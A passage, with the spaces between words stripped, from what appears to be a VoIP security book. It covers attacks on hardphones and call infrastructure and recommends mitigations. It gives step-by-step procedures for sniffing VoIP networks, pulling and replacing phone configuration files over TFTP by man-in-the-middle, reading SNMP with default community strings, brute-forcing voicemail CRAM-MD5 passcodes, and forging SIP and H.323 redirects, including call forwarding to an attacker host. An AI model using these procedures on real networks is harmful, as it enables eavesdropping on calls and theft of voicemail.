tiontothehardphone'sconnectivitymethod.Mosthardphoneshaveabuilt-inEthernetjackaswellasaconversiondevice,alargeblackblockthatresemblesapowersupply.Forexample,Avayahardphones'conversiondevicehastwoEthernetconnections,onethatconnectstothehardphone(labeledPhone)andanotherthatconnectstotheVoIPVLANthroughthewallEthernetjack(labeledLine).SomeonewhowishestosniffthenetworkshouldunplugtheEthernetcablethatisconnectedtoLineontheconversiondeviceandplugitintoahub.ThehubshouldthenbeconnectedbetweentheLinejackontheconversionblock,thewalljacktotheVoIPVLAN,andtheattacker'sworkstation(runningasnifferprogramlikeCain&AbelorWireshark).OnaCiscoVoIPhardphone,someonewhowishestosniffthe

networkshoulddisconnectthe10/100SWEthernetcablefromthebacksideofthephoneandplugitintoahub.ThepersonshouldthenconnectthehubtothesamejackusingasecondEthernetcable.Finally,thepersonshouldplugalaptop,withCain&AbelorWiresharkrunning,intothehubaswell.BoththelaptopandtheVoIPphone(specificallythe10/100SWjack)shouldbepluggedintothehub.Whilesettingthingsup,thepersonshouldbesurenottoplugthe10/100PClinkjackintothehubasthatwillnotbethecorrectsegmenttosniffon.Setupslikethesewillallowattackerstosniffthenetwork(evenwith802.1xinplace)andensurethatthehardphonesarestillinuse.Anattackerwhodoesnotneedthehardphonestobeinusecansimplyconnectaworkstationtothewalljackitself(assumingthatno802.1xauthenticationisrequired).Figure6-1showsanexample.

Figure6-1.SniffingsetuponVoIPnetworks

ThesetupwillallowtheworkstationtojointheVoIPnetworkandsniffthenetwork,withfulluseoftheVoIPhardphone.

Note✎

Iftheworkstationisconnectedbetweenthephonejackontheconversiondeviceandthehardphone,theattackerwillnotbeabletosniffthenetworkproperly;hence,thearchitectureforconnectivityisquiteimportant.

HardPhonesCisco,Avaya,andPolycomhardphonesareprobablythemostpopularphonesinenterprisenetworks.Regardlessofvendor,though,anytypeofhardphonecomeswithsecurityissues.Forexample,anattackercancompromisethephone'sconfigurationfileorsimplyuploadamaliciousone.Fortunately,usernameandpasswordinformationisusuallynotstoredinthehardphone'sconfigurationfile,sotheimpactanattackercanhaveifthefileiscompromisedissomewhatmitigated.Instead,therisksofahardphone'svulnerabilitiesaregeneralenumerationattacksandDenialofService(DoS)attacks.ThefollowingsectionswilldiscusstheseVoIPhardphonevulnerabilities:

Compromisingthephone'sconfigurationfileUploadingamaliciousconfigurationfileExploitingweaknessesofSNMP

CompromisingthePhone'sConfigurationFile

Mosthardphonesreceiveimportantfiles,suchasbootimagesorconfigurationfiles,overthenetwork.VoIPdevices,includingthosefromCiscoandAvaya,oftentransferthesefilesusingtheTFTPprotocol,butsomealsouseHTTP.Eitherway,anattackercanobtaincopiesofthesefilesquiteeasily.BothTFTPandHTTParecleartextprotocolsthatareoftenusedwithoutanyauthentication.Anattackerwhohasobtainedsuchfileshasaccesstothephone'ssettings,operatingfeatures,andoptions.Toobtainsuchafile,theattackerneedsonlytheTFTPserver'sIPaddressandthenameofthebootimageorconfigurationfile.InordertofindtheTFTPserver'sIPaddressonaCiscohardphone,forexample,theattackercansimplycheckthedisplayofthephoneitself.BychoosingtheOptionsmenuonthephoneandnavigatingtothenetworkconfigurationsettings,an

attackerwillfindmanyitemsdisplayed,includingtheTFTPserverusedonthenetworkaswellastheIPaddressofCiscoCallManager.OnanAvayanetwork,anattacker'ssniffingforUDPport69willidentifytheTFTPserver.(BecauseAvayahardphonesgetTFTPdownloadsafterreboot,theattackercansimplyrebootthephonewhilesniffingthenetwork.)OncetheattackerknowstheTFTPserver'saddress,shecansimplygrabthedesiredfileusingtheappropriateTFTPorHTTPGETcommand.Forexample,46xxsettings.txtistheconfigurationfileforanAvayahardphone.ByperformingaTFTPGETusingthatfilename,anattackercanpulldowntheconfigurationfilequicklyandeasily.Becausemostphonespullanupdatedconfigurationfileeachtimetheyarerebooted,anattackercanbereasonablysurethefilehegetsfromtheTFTPserveristhemostupdatedversion.Toobtainaphone'sconfigurationfile,anattackerwouldperformthesesteps:

1. ConnecttotheVoIPnetwork,asshownin"Vendor-SpecificVoIPSniffing"onVendor-SpecificVoIPSniffing.

2. LocatetheTFTPserverusedtouploadimages/configurationfilestohardphones.

3. LocatetheTFTPserverbysniffingthenetworkforthesourceaddressfromwhichTFTPconnectionsarrive.Aquicksearchforthe46xxsettings.txtfilewillhelplocatepacketswiththesourceTFTPserveronanAvayanetwork.Forthisexample,anattackershouldassumethattheTFTPserveris172.16.1.88.

4. EnterthefollowingataWindowscommandprompt:tftp172.16.1.88GET46xxsettings.txt

Bycompletingthesesteps,anattackercaneasilyandanonymouslyretrieveaphone'sconfigurationfilefromaTFTPserver.

UploadingaMaliciousConfigurationFile

Whenahardphonereboots,itoftendownloadsabootimageandaconfigurationfileoverthenetwork.Thesefilescontaininformationforthephonesettings,includingfunctionalityfeaturesandoptions.Asdiscussedintheprevioussection,thebootimageandconfigurationfilearetransferredfromthenetworktothehardphoneusingcleartextprotocols.Theuseofclear-textprotocolsgivesanattackertheabilitytointroduceherownmaliciousfilesintotheenvironment.Anattackerwhowantstoforceahardphonetoloadamaliciousconfigurationfilecanperformasimpleman-in-the-middleattack.ByfocusingtheattackonLayer2oftheOSINetworkingModel,anattackercanredirectallTFTP/HTTPrequestsawayfromtherealservertoamachineunderhiscontrol.Oncetheredirectionhasbeensetup,theattackercanpushmaliciousbootimages[9]andconfigurationfiles[10]tothehardphone.Thesefileswillbeinstalledduringthephone'sbootprocess,becausetheentiretransactionoccursovercleartextprotocols.Asaresultofthelackofcryptographicprotections,theuseofcleartextmakesitimpossibleforthehardphonetoverifythesendingserver'sidentity.Aftertheattacker'sbootimageandconfigurationfilehavebeenloadedonthehardphone,theattackerisabletocontrolthephoneanditsfeaturesremotely.Onlyafewphonefeaturesareattractivetoattackers.Infact,mostofthesettingsontypicalhardphonesareoflittleornointeresttoattackers.Theconfigurationfiletypicallyincludesinformationlikewhichdigittodialtomakeanoutsidecallandspeeddialsettings.However,changestocallforwarding,SIPre-registrationwaittimes,andcallrecordingallowanattackertointerceptvoicedatafromhertarget,sometimesevenwhenthephoneisnotinuse.Forexample,manyhardphonesallowuserstousethephoneasarecordingdevicewithoutplacingaphonecallorliftingthehandset.Thismeansthatwiththepropermalicious

handset.Thismeansthatwiththepropermaliciousconfigurationfile,thehardphonecanbesettorecordaudiofromthespeakermicrophone.Table6-1showsthesettingsfromanAvaya4600servicehardphonethat,toanattacker,wouldbemostinterestingtochangeanduploadtoatargeteddevice.Table6-1.SampleConfigurationInformationforAvaya4600HardPhones

Setting Description AttackPotential

SETDNSSRVR198.152.15.15SetstheDNSserverforthephone

AfakeDNSsettingwoulddisruptnameresolution,causingaDenialofService.Theattackercouldalsoredirectaphonetohisorherownmachine.

SETSYSLANGKatakanaSetsthedisplaylanguageforthephone

Anattackercansetthedisplaylanguagetosomethingunknownorrarelyused,suchasKatakana.

SETCALLFWDSTAT1Permitsunconditionalcallforwarding

Anattackercanhaveallcallsforwardedtoaspecifichardphone.Afterthecallisreceived,theattackercanthenexecuteathree-waycalltotheintendedtargetwhilestayingonthelinetolistentotheconversation.

SETCALLFWDADDRattacker@attacker.com

Setsthedestinationaddressforthecallforwardingfeature

Seeprevioussection.

SETREGISTERWAIT65536

Setsthetime,inseconds,betweenre-registrationswiththecurrentserver

Anattackercansettheregistertimeouttothemaximumvalue,allowingforaregistrationhijackattackonthesystem(showninChapter2).

SETSIPDOMAINattacker.com

Setsthedomainnametobeusedduring

Anattackercansetthedomaintoeitheramaliciousdomainserverorafakeone,causingtraffictoberedirected.

duringregistration

causingtraffictoberedirected.

SETSIPREGISTRAR192.168.0.1

SetstheIPaddressorFQDNoftheSIPregistrationserver

AnattackercansettheRegistrartohisorherownmaliciousserverorafakeone,allowingtheattackertoredirectcallsaccordingly.

Tocarryoutthisattack,anattackerwouldcompletethefollowingsteps:

1. ConnecttotheVoIPnetwork,asshownin"Vendor-SpecificVoIPSniffing"onVendor-SpecificVoIPSniffing.

2. LocatetheTFTPorHTTPserverusedtouploadbootimagesandconfigurationfilestohardphones.(TheprevioussectioncontainsdetailedinformationondiscoveringTFTPservers.)

3. StartaTFTPserveronherownmachineandensurethatthemaliciousfiles46xxsettings.txtanda01d01b2_3.bin(bootimage)areintherootoftheTFTPserverdirectory.

4. Unplugtheattackingmachinefromthenetwork,thenchangetheIPaddressofthatmachinetotheIPaddressoftheTFTPserver.

5. PlugtheattackingmachinebackintothenetworkandignoreanyIPaddressconflicterrors.

6. UsingCain&Abelontheattackingmachine,performaman-in-the-middleattack,redirectingalltrafficdestinedfortherealTFTPservertohisownmachine,whichwillhaveadifferentMACaddressbutthesameIPaddress.

Done!Whilethisattackwillbeintermittent,dependingonthelocationoftherealTFTPserver,hardphoneswillnowtaketheirimageandconfigurationsettingsfromthemalicioussource.

ExploitingWeaknessesofSNMP

Likemanydeviceswithanoperatingsystem,hardphonesoftenenablenetworkservicesforavarietyofmanagementpurposes.Specifically,VoIPhardphonesoftenhaveSimpleNetworkManagementProtocol(SNMP)enabled.SNMPisacommonmethodusedtomanagenetworkdevices.SNMPversion1(SNMPv1)isthemostpopularversion;however,itisalsotheweakest.SNMPv1isacleartextprotocolthatletsreadandwritecommunitystrings(whicharesimilartodevicepasswords)traversethenetworkwithoutencryption.Theuseofcleartextcommunitystringsisobviouslyaweaksecuritypractice.Furthermore,moreoftenthannot,thecommunitystringthatgrantsreadaccesstothedevicesanditsconfigurationinformationisusuallysetaspublic.Hence,anydeviceusingSNMPv1canbecompromisedbyeitheranattacker'sguessingaweakreadorwritecommunitystring(suchaspublicorprivate,respectively)orbyanattacker'ssniffingthenetwork.OnceanattackerhasgainedSNMPaccesstoahardphone,shecanaccessthephone'sspecificconfigurationsettings.Thisallowshertoperformfurtherattackswithadvancedinformationaboutthedevice,liketheroutetableofremotedevicesortheLDAPauthenticationserver.TopullinformationfromahardphoneusingSNMP,anattackerwouldcompletethefollowingsteps:

1. DownloadanSNMPtool,suchasGetIf,topullinformationfromSNMPdevices.GetIfcanbedownloadedfromhttp://www.wtcs.org/snmp4tpc/getif.htm/.

2. OpenGetIffromtheStartMenu(Start►Programs►GetIf).3. TypetheIPaddressofthehardphoneintheHostnametext

box.4. IntheSNMPParameterssection,entertheSNMPreador

writecommunitystring.Theattackerwouldleavethisas

publicorprivateifhehasnotalreadysniffedtheinformationoverthenetwork.

5. SelecttheStartbuttononthebottomright-handside.(Ifpublicisthecorrectreadcommunitystring,informationwillbedisplayedimmediatelyinthevarioustextboxes.)

6. Inordertogetthespecificconfigurationinformationfromthehardphone,selecttheMBrowsertab.

7. SelectStart.

ThespecificconfigurationinformationstoredinSNMPfileswillbedisplayedintheMBrowsertab.Theattackercansimplyexpandthe+symbolstolookforspecificinformation,asshowninFigure6-2.

Figure6-2.SNMPfilesfromhardphones

[9]a01d01b2_3.binonAvayahardphones[10]46xxsettings.txtforAvayahardphones

CiscoCallManagerandAvayaCallCenterCiscoCallManagerandAvayaCallCenter/ServerareproductsthathandlecallstoandfromVoIPhardphones.WhiletheCiscoandAvayaproductsmightbepopularproductsforenterpriseVoIPnetworks,opensourcesoftwaresuchasAsteriskcanalsobeused(ifstandardprotocolssuchasSIP,H.323,RTP,and/orIAXhavebeenimplemented).Anyserver'sinsecureuseofSIP,H.323,RTP,and/orIAXisofprimaryconcernwhenusingVoIP.Forexample,theauthenticationmethodforSIPisastrongsecurityconcern,regardlessofwhetherSIPhasbeenenabledonAvaya,Cisco,orevenAsterisk.Nonetheless,bothCisco'sandAvaya'sproductshaveaslewofinsecureservicesrunning,suchasTFTP,FTP,SNMP,telnet,andHTTP,thatshouldbedisabledimmediately.Furthermore,moresecureservices,suchasSSH,arenotupdatedoften,soexistingservicesmaybevulnerabletodatedsecurityattacks.Thissectionwillreviewcommoninfrastructuresecurityissuesonnetworkservices,including,butnotlimitedto,VoIPsoftwareanddevices.Table6-2listscommonlyusedinsecureservices,recommendationsformitigatingvulnerability,andthebestopensourcetoolfortestingtheissue.Table6-2.InsecureServicesUsedwithVoIP,MitigationRecommendations,andTestingTools

Services Recommendation Tool

FTP Disablecleartextmanagementprotocolsinfavorofencryptedcommunicationwithtwo-factorauthentication

Nmap,Nessus

telnet ImplementSSHwithtwo-factorauthentication Nmap,Nessus

OutdatedOpenSSH EnsureallSSHserversareuptodateandfullypatched Nmap,

Nessus

Outdated Nmap,

OutdatedOpenSSL EnsureSSLlibrariesareuptodateandfullypatched

Nmap,Nessus,Nikto

OutdatedApacheBuild

EnsureallwebserversareuptodateandfullypatchedNmap,Nessus,Nikto

CertificatesAllSSLcertificatesshouldbecurrentanduptodate.EnsurethattheSSLcertificationisnotself-signedandisforthecorrecthost(donotusethedefaultcertacrossallVoIPendpoints).

Nmap,Nessus,Nikto

SNMP EnableSNMPv3withcomplexanduniquecommunitystrings GetIf,Nessus

Logging Enableloggingoptionsonmediagateways N/A

Asmentionedpreviously,thebestwaytocheckforthesenetworkissuesisbyusingNmap(http://www.insecure.org/),Nikto(http://www.cirt.net/),orNessus(http://www.nessus.org/).Thesethreeopensourcetoolswillshowwhichportsareopen,whichwebapplicationdefaultsareexposed,andwhichnetworkservicesarevulnerable.AcombinationofthesethreetoolsonanyCiscoorAvayaVoIPapplication/appliancecanuncoveranyofthevulnerabilitieslistedinTable6-2andmuchmore.

UsingNmaptoScanVoIPDevices

Nmapistheindustry'smostpopularandmostsupportedportscanner.ByportscanninganyVoIPdevice,ausercanseeifvulnerableportsandserviceshavebeenenabled.Forexample,ifTCPports21(FTP),23(telnet),and80(HTTP)orUDPports69(FTP)or161(SNMP)appear,theattackerwillhaveafewavenuesforattack.Usingtheseservicesformanagementwillexposeadministrativepasswordsoverthenetworkincleartext,allowingasimpleman-in-the-middleattacktocompromisethedevicesandanyhardphonesregisteredtoaVoIPdevice.ToanalyzeaCiscoorAvayaVoIPapplication/appliancewith

Nmap,anattackerwouldcompletethefollowingsteps:

1. DownloadNmapfromhttp://www.insecure.org/.2. OnceNmaphasbeeninstalled,enterthefollowingata

commandprompttoenumerateany/allportsexposedonthedevice(where172.16.11.08istheIPaddressoftheCiscoCallManagerorAvayaCallCenter/Server):

nmap-sT-P0-p1-65535172.16.11.08

Figure6-3showstheexampleresultafterport-scanninganAvayaCommunicationManagerdevice.

Figure6-3.PortscanresultsonAvayaCommunicationManager

ScanningWebManagementInterfaceswithNikto

Niktoistheindustry'smostpopularCGIscannerforwebapplications.ByscanningthefileandservicesonVoIPwebmanagementinterfacesoverHTTP,anattackercanseewhatdefaultpagesorvulnerableattacksareenabledonthesystem.IfdefaultApachepagesareloadedorifdirectorybrowsingisallowedbythewebserver,thesystemcouldbevulnerableto

attack.ManagingVoIPproductsusingawebinterfacecanallowsimpleCGI,directorytraversal,andforcedbrowsingattackstograntunauthorizedusersaccesstothesystemandanyhardphonesregisteredtoit.TorunNiktoagainstaCiscoorAvayaVoIPapplication/appliance,anattackerwouldcompletethefollowingsteps:

1. DownloadNiktofromhttp://www.cirt.net/.2. OnceNiktohasbeeninstalled,enterthefollowingata

commandprompt(where172.16.11.08istheIPaddressoftheCiscoCallManagerorAvayaCallCenter/Server):

nikto.pl-host172.16.11.08

3. Reviewtheoutputtodiscoveranyandallvulnerablewebserversettings.

DiscoveringVulnerableServiceswithNessus

Nessusisanotherpopularscannerforsecurityvulnerabilities.UnlikeNmap,whichperformsportscanningonly,Nessuswillalsolookforvulnerableservicesrunningonthedevice.AndunlikeNikto,Nessuswillscanallportsonamachine,includingTFTP,SNMP,FTP,SSH,andthelike.Duringthescan,Nessussearchesforvulnerabilityissues,outdatedservices,andsecurityexploits.ToscanaCiscoorAvayaVoIPapplication/applianceusingNessus,anattackerwouldcompletethefollowingsteps:

1. DownloadNessusfromhttp://www.nessus.org/.2. Installtheapplicationbasedonthesetupinstructions.3. Onceinstallationiscomplete,openaNessusclientlike

NessusClient(http://www.nessus.org/download/index.php/)andconnecttotheNessusserver.

4. OnceconnectedtotheNessusserver,typetheIPaddressoftheCiscoCallManagerorAvayaCommunicationManagersystem.Afterthescaniscomplete,theNessus

reportwillshowallvulnerableservicesorsecurityexploitsontheexistingsystem.

ModularMessagingVoicemailSystemModularMessagingisavoicemailapplicationfromAvaya.TheapplicationintegrateswithAvaya'sVoIPdevices,allowinguserstologintoawebapplicationandchecktheirvoicemail.Inadditiontothewebapplication,ModularMessagingcanalsointegratewithMicrosoftOutlook,allowinguserstoimporttheirvoicemailsintoOutlook.AspecialOutlookplug-in,whichwillshowan"AvayaInbox"folderinauser'sOutlookclientaftertheplug-inhasbeeninstalled,isrequiredforthisfeature.Onceithasbeeninstalled,allvoicemailswillappearinOutlookunderthisnewlycreatedfolderassoundfiles.Unfortunately,ModularMessaginghasafewsecurityissuesthatthreatentheprivacyofuservoicemailmessages.Thefirstissueisthewebapplication'sdatavalidationmethods,whichcouldleadtosevereSQLinjectionandcross-sitescriptingvulnerabilities.Theapplication'sspecificsecurityflawsarebeyondthescopeofthisbook;however,thewebapplicationhasalotofroomforimprovementwhenitcomestosecureinputhandling.ThesecondaspectofModularMessaging,theOutlookplug-infeature,alsopresentssecurityissues.Theseissuesallowuserstocompromiseotherusers'voicemailboxes.Theplug-inrequiresauthenticationbetweentheModularMessagingserverandauser'sOutlookclient.TraditionalOutlookNTLMv1/v2orKerberosauthenticationisusuallywrappedwithSSL.However,theAvayaOutlookplug-inusesaweakchallenge/responsemethodoftenusedinSMTPorIMAPauthentication,knownasChallengeResponseAuthenticationMechanism(CRAM-MD5).WithAvaya'sModularMessagingserver,theCRAM-MD5hashiscreatedfromtheenduser'spasscodeandchallenge.ThechallengegivenbytheModularMessagingserverisBase64encoded,whichofferslittletonoprotectionbecauseitistrivialtoreverseusingahandfulofprograms.Furthermore,the

attackisevenmoretrivialthanmostofflinebrute-forceattacksbecauseavoicemailpasscodeusuallyconsistsofonly4numericfields.Becauseallcommunicationbetweentheuser'sOutlookclientandtheModularMessagingserverusescleartextprotocols,ausercansniffthechallenge,reversetheBase64encoding,andperformanofflinedictionaryattacktoretrievethevoicemailpasscodeforallvoicemailboxesonthesystem.Becausethepasscodeconsistsofonly4numericfields,theattackrequiresonly10,000attempts(0to9,999).TheseattemptscanbemadeinaboutfivesecondsonaPentium4processor.Onlywhenthepasscodeconsistsof14charactersdoesittakeconsiderablylongertocrack.Inordertocompletethisattack,amaliciousinsidermustpassivelysniffthenetworkandgainaccesstoallauthenticationattemptsfromtheOutlookclientandtheModularMessagingserver.(Note:Switchednetworksdonotpreventsniffingattacks.)Onceanattackerisabletosniffthenetwork,sheneedsonlytocapturetwoofthethreeitemsrequiredtocracktheaccountsoffline,includingthechallengeandtheresultingCRAM-MD5hash.BoththeCRAM-MD5hashandthechallengearesentoverthenetworkincleartext,allowingtheequationbelowtobetheattacker'srecipeforsuccess.Itemsinboldherearesniffedoverthenetworkanditemsinbolditalicarebrute-forced:

CRAM-MD5=Passcode+Challenge-CRAM-MD5=Ac2158a7d4c2287874d485501d67d807-Challenge=3458074250.7565974@mmlab2mss01lnx-Passcode=??????????495278A176DA26D72149954E06792CB7=MD5(0001+3458074250.7565974@mmlab2mss01lnx)1E6E2D30C84331475EB94D14BEAD1351=MD5(0002+3458074250.7565974@mmlab2mss01lnx)ADDD6C5A96E0545D75DC03270B40BAAF=MD5(0003+3458074250.7565974@mmlab2mss01lnx)9CDAB50A50CBD26A8511C3CAE6302701=MD5(0004+3458074250.7565974@mmlab2mss01lnx)AD7827249D7A704857161DFADCAE0A69=MD5(0005+3458074250.7565974@mmlab2mss01lnx)...AutomaticallyContinued...Ac2158a7d4c2287874d485501d67d807==MD5(2006+3458074250.7565974@mmlab2mss01lnx)-Match!!

Notethelastrowintheattackprocess,wheretheresultoftheguessedpasscodeof2006andthechallengeof3458074250.7565974@mmlab2mss01lnxisAc2158a7d4c2287874d485501d67d807.Thisisthesamevalue

Ac2158a7d4c2287874d485501d67d807.Thisisthesamevaluethatwassniffedoverthenetwork.Hence,theattackercanconcludethattheuser'svoicemailpasscodeis2006.InordertopreventauthenticationattacksonModularMessaging,useSSLwithLDAPtokeepattackersfromsniffingtheauthenticationcommunication.Alternatively,alongerPINcouldalsoberequired;however,thesizerequiredtopreventcrackingofthePINbecomesquitelarge(14),asshownhere:4numericfields:Lessthan1minute6numericfields:Lessthan1minute8numericfields:4minutes10numericfields:7hours12numericfields:32days14numericfields:7years16numericfields:700yearsTocompromiseauser'svoicemailpasscodeusingtheOutlookModularMessagingplug-in,anattackerwouldcompletethefollowingsteps:

1. Performaman-in-the-middleattackusingCain&Abel.See"UsingCain&AbelforMan-in-the-MiddleAttacks"onUsingCain&AbelforMan-in-the-MiddleAttacksformoredetails.

2. OnceauserchecksvoicemailviatheAyavaOutlookplug-in,selecttheSniffertabonthetoprow.

3. SelectthePasswordstabonthebottomrow.4. HighlightSMTPontheleftpane(seeFigure6-4).

Figure6-4.CapturedchallengesandCRAM-MD5hashesfromAvayaModularMessagingserver

5. Oncethechallengesandhasheshavebeencaptured,highlighttherowthatistobecracked,asshowninFigure6-4,wherethesecondrowishighlighted.

6. Right-clicktherowandselectSendtoCracker.7. SelecttheCrackertabonthetoprow.Thehashand

challengethatwerejustexportedfromthepasswordstabshouldappear.

8. Highlighttherow,thenright-clickandselectBrute-forceattack.

9. ClicktheStartbutton,andwithinafewsections,Cain&Abelwillhavecarriedoutabrute-forceattackonthepasscode,whichis2006(seeFigure6-5).

Figure6-5.Compromisedpasswordfromcarryingoutabrute-forceattackonCRAM-MD5hashesfromAvayaModularMessagingserver

InfrastructureServerImpersonationMovingbeyondattacksagainstinfrastructuresystems,attacksimpersonatinginfrastructureVoIPdevicesareabitmoreinteresting.Anattacker'sabilitytospoofalegitimategatekeeper,Registrar,Proxyserver,oranyotherVoIPauthenticationentitycanbequiteharmful.Thissectiondescribestheuseofafakeinfrastructuresystemtogainaccesstoauser'sVoIPcredentials,eavesdropontheuser'scalls,orredirectacall'sdestination.TheVoIPentitieswewilldiscussare:

SpoofingSIPProxiesandRegistrarsRedirectingH.323gatekeepers

SpoofingSIPProxiesandRegistrars

ManyspoofingattacksagainstVoIPnetworksthatuseSIParepossible,includingtheabilitytospoofinfrastructuresystemssuchasSIPProxyserversandSIPRegistrars.DuringaSIPINVITErequest,aSIPclientsendsaSIPProxyserverorRegistraranINVITEpacket.Beforethelegitimateservercanrespond,anattackercansubmitaforgedresponsethatappearstobefromtherealdomainbutthathasadifferentIPaddress,therebyredirectingtheUserAgenttoaSIPProxyserverorRegistrarcontrolledbytheattacker.Forexample,ifaSIPUserAgenttriedtocontacteNapkin(http://www.enapkin.com/)withthecontactaddress172.16.1.100,anattackercouldforgearesponsefromeNapkinwiththecontactaddressof172.16.1.150,whichisaSIPProxy/Registrarthattheattackercontrols.WhenthelegitimateUserAgentwishestocallusersineNapkin,theattackercanredirectcallstoanySIPclientofhischoosing.Inthisscenario,anattackercouldredirectcallstoaclienthecontrolsaswellasthelegitimateclientforthecall,allowingtheattackertolisten

toallcallstoorfromtheirtarget.ThespoofedSIPpacketfromtheattackerwouldlooksimilartothefollowing(noticetheContactline,wheretheIPaddressoftheattackerislisted):

SIP/2.0302MovedTemporarilyTo:<sip:Sonia@172.16.1.100>From:<sip:Raina@172.16.1.100>;tag=1108Call-Id:11082006@172.16.1.100CSeq:1INVITEContact:<sip:attacker@172.16.1.150>

OncetheUserAgentreceivesthespoofedpacket,itwillattempttocontacttheSIPProxyserverontheaddressspecifiedonthecontactfield.TheUserAgentwillthenbecommunicatingwiththefakeSIPProxyserverorRegistrar,thusallowingtheattackertocontroltheUserAgent'scommunicationpath.

RedirectingH.323Gatekeepers

H.323gatekeeperscanalsoberedirectedprettysimply,dependingontheimplementation.IfanH.323endpointdoesnothaveastaticgatekeeperset,itsearchesforonebysendingaGatekeeperRequest(GRQ)packetoverthenetworkto224.0.1.41onport1718.[11]EachH.323endpointwillusethisaddresstofindthelocalgatekeeperonthenetwork.ThetrickherefortheattackeristorespondtothepacketfirstandtelltheH.323endpointtoregistertoagatekeeperunderhercontrol.TheGatekeeperConfirmation(GCF)packetsentbytheattackercanforceH.323endpointstoroutealltheircalls,bothcleartextandencrypted,throughamaliciousintermediary.Alternatively,toensurethatthecalliscompletedproperly,themaliciousgatekeepercanpointtothelegitimategatekeeperonthenetwork,ensuringthatallcallsareactuallyrouted.OncetheH.323endpointagentreceivestheGCFpacket,theendpointwillthenbecommunicatingwiththeattacker'sgatekeeper,thusallowingtheattackertocontrolthevoicecommunicationpath.Inmanysituations,astaticIPaddresswillbeenteredforanendpoint'sgatekeeper;however,thatstilldoesnotpreventthe

endpoint'sgatekeeper;however,thatstilldoesnotpreventtheredirectionattack.Evenifanendpointdoesnotsendadiscoverypacketto224.0.1.41,anattackercanstillupdatetheendpoint'sgatekeeperinformationwithmaliciousdata.Inordertoperformthisattack,anattackercanmonitorthenetworkandwaituntiltheendpointisrebootedorsimplyforcearebootbyperformingaDoSattackontheendpoint.Whenanendpointbeginsthebootprocess,itlooksforitsstaticallyenteredgatekeeperaddress.Atthistime,anattackercanoverridethestaticentrywithitsforgedGCFresponse,containingitsowngatekeeperinformation.Muchasintheprevioussituation,theGCFpacketsentbytheattackerwillforcetheH.323endpointtoupdateitsgatekeeperinformation.Thus,whileastaticallyenteredgatekeeperaddresshasbeenusedonthenetwork,theendpointwillstilloverridethatinformationifaGCFpacketisreceivedfromthenetworkwithnewinformation.Oncethenewinformationisreceived,thedataintheGCFpacketwillbeusedbytheendpoint.Itshouldbenotedthattheattacker'sGCFpacketmustreachtheendpointsbeforethelegitimategatekeeper'sGCFpacket,whichmeansthattimingandproximityarekeyrequirementsifsuchanattackistobesuccessful.ThisallowsanattackertocontrolthevoicecommunicationpathofH.323endpoints.

[11]224.0.1.41isareservedClassDmulticastaddressforgatekeeperdiscovery.

SummaryVoIPinfrastructuresystemsarethebackboneofvoicecommunication.H.323endpointsandSIPUserAgentsrelyonthesesystemstoensurethatcallsaremanagedproperlyandsecurely.ThischaptershowedhowVoIPsoftwareandhardwareappliancescanbeattackedand/orabusedsimilarlytothewayanyothertechnologywithaTCP/IPstackcanbeattackedand/orabused.Forexample,avulnerableCiscorouterrunningTFTPisnotmuchdifferentfromavulnerableCisco/AvayahardphonerunningTFTP.BothdevicesarevulnerabletoallattacksthatfallundertheTFTPumbrella.WhetheritisahardphoneorCisco/AvayaCallManagersoftware,eachservicerunningonthesesystemsneedstobesecured.AdvancedapplicationsusingVoIPtechnology,suchasvoicemailapplications,needtobehardenedalso.Theassumptionofprivacyonvoicecallscarriesovertovoicemails;therefore,theargumentoftreatingemail,whichmostpeopleknowisnot100percentprivate,similarlytovoicemail,whichisalsonot100percentprivate,butisassumedtobe,doesnotapplywell.Whileweakvoicemailpasswordshavenotgenerallyhadadirecteffectonprivacy,VoIPchangesthatsituationasbrute-forceattacksonfour-digitvoicemailpasswordscanbecarriedoutofflineinamatterofminutes.Lastly,criticalVoIPinfrastructuresystems,suchasSIPRegistrars,SIPProxyservers,andH.323gatekeepers,canallbeeasilyspoofed.Anattacker'sspoofingtheseentities,whichareoftenresponsibleforauthentication,willspellbadnewsforthenetworkanditsusers.Hence,thereisastrongneedforVoIPinfrastructuresoftwareandhardwaretobesecured,alongwiththeprotocolstheyuse.IfVoIPisgoingtoprovideanysecurityguaranteestoitsusersandcustomers,itmustresideonaninfrastructurethatcanberegardedassecure.AttackerswhoareboredwithalltheattacksonSIPandH.323

mayfinditeasiersimplytoattacktheVoIPbackbonecomponentstohaveagreaterimpactonthesystem.Thedevelopmentofaninfrastructurethatisimmunetousers'sniffingonthenetworkorsecurityattacksonTFTP,DNS,andDHCPisdesperatelyneeded.VoIPsoftwarevendorsneedtoconsidertheirproductsasadatabaseofsensitivedataintheaudioformat(ratherthanthefileformatusedbyOracleandSQLServer)andprovidesecurityprotectionsappropriately.Also,VoIPnetworkdevicesmustbeabletoprotectagainstserverimpersonationorredirection.Properauthenticationandintegritycheckingarepopularforclient-to-servercommunicationbutshouldalsobeusedforserver-to-clientverificationaswellasservertoserver.

Chapter7.UNCONVENTIONALVOIPSECURITYTHREATSInadditiontoprotocolattacksonSIP,H.323,IAX,andRTP,aswellasattacksagainstspecificVoIPproducts,manyunconventionalattacksagainstVoIPnetworkscancausealotofharm.Forexample,intheemailworld,aspamattackisneithersophisticatednorcomplextoperform;however,theheadachesspamhasbroughttoemailusers,fromthenuisanceofbulkemailtophishingattacks,makespamamajorissueforemailusers.ThischapterwilltakeasimilarapproachtoVoIPbyshowingexistingattacksthathavethepotentialtobeamajornuisance.ThefocusofthischapterwillbehowVoIPtechnologies,whileverycomplexthemselves,arestillopentomanysimpleattacksthatcancausealotofdamage.Whentheseminorflawsareappliedtotrustedentities,suchasauser'stelephone,theyhavetheabilitytotrickusersintodoingthingstheynormallywouldnotdo.When,forexample,anemailasksyoutoclickalinkandsubmityourpersonalinformation,mostusersarewiseenoughtoignorethatrequest.However,whatifusersreceivedanautomatedphonecallpurportedlyfromtheircreditcardcompany'sfrauddetectionservices?Wouldusersfollowthedirectionsinthemessage?Wouldtheycheckifthe800numberprovidedinthemessagematchestheoneonthebackoftheircreditcard?Thisscenario,alongwithmanyothers,isdiscussedinthischapter.TheattacksshowninthischaptercombinetheweaknessesofVoIPnetworks,theabilitytoperformsocialengineeringattacksonhumanbeings,andtheabilitytoabusesomethingweallfeelistrustworthy(ourtelephone)tocompromiseVoIPendusers.Specifically,theattacksshowninthischapterarethefollowing:

VoIPphishing

Makingfreecalls(intheUnitedStatesandUnitedKingdom)CallerIDspoofingAnonymouseavesdropping/callredirectionSpamOverInternetTelephony(SPIT)

Beforewebeginthischapter'sdiscussions,takeafewmomentstosetupthenecessarylabenvironment.Completingthefollowingstepswillensurethattheproofofconceptattacksshowninthischapterwillworkcorrectly.

